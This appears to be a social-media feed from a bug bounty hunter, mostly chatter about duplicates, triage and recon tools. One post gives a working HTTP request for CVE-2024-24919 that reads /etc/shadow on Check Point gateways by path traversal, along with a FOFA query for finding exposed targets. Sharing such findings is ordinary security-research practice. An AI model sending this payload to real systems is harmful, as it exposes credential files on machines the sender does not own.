If you are going to try ! Go all the way ✨️
Security Engineer !| Bug bounty hunter !| Pentester | whitehat
@Immunefi
| bugcrowd | hackerone | hackenproof .
CVE-2024-24919 :- allow attacker to read info on check point and remote acess Just make a post request to your target
POST /clients/MyCRL HTTP/1.1
host: target
Content-Length: 39
aCSHELL/../../../../../../../etc/shadow
---------
FOFA Query: app="Check_Point-SSL-Network-Extender"
I Reported 6 valid Bugs to Auth0 ! Almost all the triage but 4 of them are externally tracked duplicate sumission! And 2 are internally Duplicate!
What's your thoughts on this? Externally duplicate thing !
#BugBounty
#bugbounty
Hi
@TomNomNom
i always wanted to know that which vps service you are using during the recon stream with nahamsec ! And also which terminal ! are you using Wsl with some type of theme ? i will be glad if you answer this .
I think Social media apps takes your lot of valuable time ! I will try to distance myself from them ! And Try to no more post about bounties ! Its better to keep things private!
Thnx for validating report ! This triager is very much professional and calm! I really liked his behavior towards my report
@Hacker0x01
#bugbounty
#hackerone
From the one week challenge ! I have got votes to hunt on metamask , trip , ring and compass program ! I hunted on all of them !Two bugs got duplicate ! One bug in triage state and other are pending !I will post bounty for triage bugs !Lets wait for company response!
#bugbounty
* Happy Side bug bug bounty = Bounty
* What about Sad Side? = Duplicates , N/A , Informational , Internally found 🥲
Drop What i am missing!
#BugBounty
#bugbounty
Hi I have a question for triagers . Is adding background music or song to the Poc video IS ok ? Or it is creating disturbance during Focus on Poc?
#bugbounty
I was waiting for this! The mission challenge was actually hard! I was only able to get 2 flag out of all the parts ! Thnx for video
@NahamSec
very much needed !
@_JohnHammond
Not applicable 🥲1. Got an endpoint from wayback 2. It is the registration form 3. Email parameter is present in the url
#bugbounty
4. Now when the user fill amd submit the registartion | the registartion will be sended to the email prsent in url
5. Attacker can change the email